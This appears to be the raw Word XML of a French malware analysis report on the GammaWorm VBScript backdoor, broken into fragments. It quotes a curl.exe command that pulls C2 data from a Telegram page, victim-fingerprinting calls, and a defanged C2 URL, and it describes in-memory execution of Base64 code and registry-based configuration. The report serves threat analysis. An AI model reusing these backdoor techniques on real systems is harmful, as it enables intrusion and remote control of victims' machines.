            <wp:docPr id="20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71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70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854709" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="85470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9312" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5969635</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8497579</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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0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8497579</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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9552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8712209</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4047490" cy="415289"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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47490" cy="415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47490" h="415289">
                          <a:moveTo>
                            <a:pt x="635" y="415289"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="215899"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4046855" y="215899"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4046855" y="415289"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="216534"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4047490" y="216534"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2770504" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2770504" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2968624" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2968624" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2769870" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="296926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057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990597</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="2320937"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="202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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-26" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="23209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2320937">
                          <a:moveTo>
                            <a:pt x="0" y="2320937"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="232093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232093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4988557</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="1889137"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="202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alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-32" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="18891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1889137">
                          <a:moveTo>
                            <a:pt x="0" y="1889137"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="188913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188913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262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364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0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4672" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1564640</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3288050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4469181" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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9181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13 – Exemple d’utilisation d’un canal Telegram public afin de récupéré l’IP du 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5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3540783</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5383971" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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39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GammaWorm exécute la commande suivante pour récupérer le contenu de la chaîne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6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3833477</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4956644" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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664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curl.exe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hxxps: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//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www.telegram.me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/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s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/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oberfarir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o C:\Users\[</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle56"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">USER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7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3988417</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2610980" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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0980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\AppData\Local\Temp\cancelH0S.mpg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8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4163718</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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 contenu HTML de la page est enregistré dans le répertoire temporaire de l’utilisateur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9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4337073</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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actuel. GammaWorm analyse ce fichier pour extraire une adresse IP obfusquée à l’aide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0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4510428</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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d’une expression régulière. Une fois désobfusquée, cette adresse IP est utilisée comme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4683783</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2969816" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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98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destination d’une requête POST personnalisée.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2864" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1558289</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6854210</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4480496" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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049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14 – Structure de la requête POST permettant d’exfiltrer l’empreinte de la victime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3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7106943</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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Cette requête POST est conçue pour exfiltrer l'empreinte digitale de la machine compromise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4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7280298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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via les en-têtes HTTP, qui sont renseignés avec des valeurs aléatoires calculées à la volée.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5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7453653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5787146" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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71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La liste exhaustive des valeurs sélectionnées au hasard sont codées en dur.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6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7627008</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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Il convient de noter que la requête ne contient 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pas de corps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de message. Les données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7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7818978</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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victime sont plutôt intégrées dans la chaîne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User-Agent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. Cette chaîne est construite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9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8015628</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2487851" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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78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l’aide de fonctions natives de VBScript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0032" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5159362</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8290583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="416424" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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4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d’hôte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1056" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3946906</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8290583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="307857" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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8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nom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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6480924</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8290583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="256308" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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30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3104" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2897619</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8290583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="144149" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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14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412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8290583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="820906" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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09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Récupère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5152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8482553</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4719700" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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1970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WScript.Shell.ExpandEnvironmentStrings("%computername%")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617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8697818</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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Récupère le numéro de série du lecteur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et le convertit en hexadécimal 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720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8913083</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4103888" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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388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Hex(FileSystemObject.GetDrive("C:").SerialNumber)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822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0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924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0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027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0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129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0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0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531776" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2585085</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1615449</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1968503" cy="1323340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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8503" cy="13233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8499" h="1323340">
                          <a:moveTo>
                            <a:pt x="0" y="1323340"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="1123950"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1099820" y="1123950"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1099820" y="1323340"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1770379" y="934719"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1770379" y="735330"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1968499" y="735330"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1968499" y="934719"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="290829" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="290829" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1308099" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="130809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3824" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3678555</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5008889</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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5872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5008889</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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7920" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6118225</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5008889</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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8160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5008889</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2522858" cy="1007109"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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2858" cy="10071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22855" h="1007109">
                          <a:moveTo>
                            <a:pt x="635" y="1007109"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="807720"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2245995" y="807720"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2245995" y="1007109"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="808354"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2246629" y="808354"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="603250"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="403859"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2245995" y="403859"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2245995" y="603250"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="404494"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2246629" y="404494"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2522855" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="252285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918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0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020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0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1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20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fois la requête envoyée, le comportement varie en fonction du code d'état HTTP reçu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2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757387" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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3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serveur C2.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1409088</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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Le C2 répond par un co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de HTTP 200 O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K : il récupère le corps de la réponse et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430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1601058</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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convertit en texte via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ADODB.Stream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. Si le texte contient du contenu HTML,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532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1797708</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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l’exécution s’interrompt. Cela suggère l’existence d’un mécanisme conçu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635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1971063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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générer du bruit réseau ou imiter un trafic légitime. Si la balise est absente,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737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2144418</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385953" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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contenu est analysé comme du VBScript valid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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">e. 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Il désobfusque les données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840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2336388</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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supprimant les retours chariot et les marqueurs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&amp;&amp;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insérés par l’opérateur. Il décode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942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2533038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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ensuite le contenu d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e Base64 en texte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clair et l’exécute immédiatement en mémoire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044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2725008</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2448405" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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840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l’aide de la fonction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ExecuteGlobal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147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2924833</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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Le C2 répond par un code HTTP 404 Not Found : contrairement au protocole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249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3098188</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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standard, une erreur 404 déclenche une mise à jour de la configuration. Il analyse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3269838</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5384683" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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46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corps de la réponse à l’aide de délimiteurs spécifiques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/</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="22"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> et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?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) pour extraire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454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3448073</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4469648" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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696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données de configuration et mettre à jour les clés du registre Windows.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5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3710328</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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Dans un environnement contrôlé, Sekoia a reproduit une requête POST qui a généré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6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3880750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5792095" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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209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réponse 404 contenant la chaîne suivante : </w:t>
                        </w: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hxxps://efficiency-planes-emotions-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7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4057280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5096325" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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63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fascinating.trycloudflare[.]com/@myrain/Xh1Lta2Ccro?84wtj9ob-01-31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8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4341518</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2558260" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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82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Cette chaîne est divisée en trois parties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966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4616473</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2221354" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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13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Domaine</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="3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4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C2</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="3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4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0688" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3933913</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4613540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2759246" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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924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hxxps://efficiency-planes-emotions-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1712" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4338193</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4796178</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2398405" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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84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est</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="38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4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enregistré</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="385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44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273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4793245</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2412549" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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5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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">fascinating.trycloudflare[.]com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4994498</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2539870" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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987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HKCU\Console\WindowsResponby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4784" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3891914</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4994498</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2346070" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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607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HKCU\Console\WindowsUpdates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580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5191390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Point de terminaison Telegra.ph :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84wtj9ob-01-31</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle31"/>
                            <w:spacing w:val="29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"/>
                          </w:rPr>
                          <w:t xml:space="preserve">est écrit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6832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5398358</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2303028" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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302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HKCU\Console\WindowsTelegra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785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5595250</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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Point de terminaison Teletype.in :</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="10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@myrain/Xh1Lta2Ccro</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle31"/>
                            <w:spacing w:val="16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est écrit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888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5802218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2241435" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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143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HKCU\Console\WindowsDetect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9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6090943</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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À la suite de la requête POST, GammaWorm entre dans un cycle de veille de 28 secondes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0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6264298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4080291" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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802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codé en dur avant de répéter le processus de communication C2.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1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6539253</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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Cette boucle infinie confirme sa fonction de porte dérobée, permettant à l’opérateur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2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6712608</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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d’exécuter à distance du code VBScript arbitraire ou de mettre à jour la configuration C2 à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6885963</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="408277" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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82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volée.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50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0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604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0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707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0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809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0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912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0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59936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1265564</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="4994910"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20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994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994910">
                          <a:moveTo>
                            <a:pt x="0" y="688974"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="688974"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1529080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1529080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="688974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689610"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="689610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  <a:moveTo>
                            <a:pt x="0" y="4190365"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4190365"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4994910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4994910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4190365"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3311524"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3311524"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4190999"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4190999"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3311524"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2689860"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2689860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3312160"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3312160"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2689860"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1529080"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1529080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2689860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2689860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1529080"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="688974"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="688974"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1529080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1529080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="688974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689610"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="689610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345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2794644</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="3465829"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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4658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465829">
                          <a:moveTo>
                            <a:pt x="0" y="2661284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2661284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3465829"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3465829"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2661284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1782444"/>
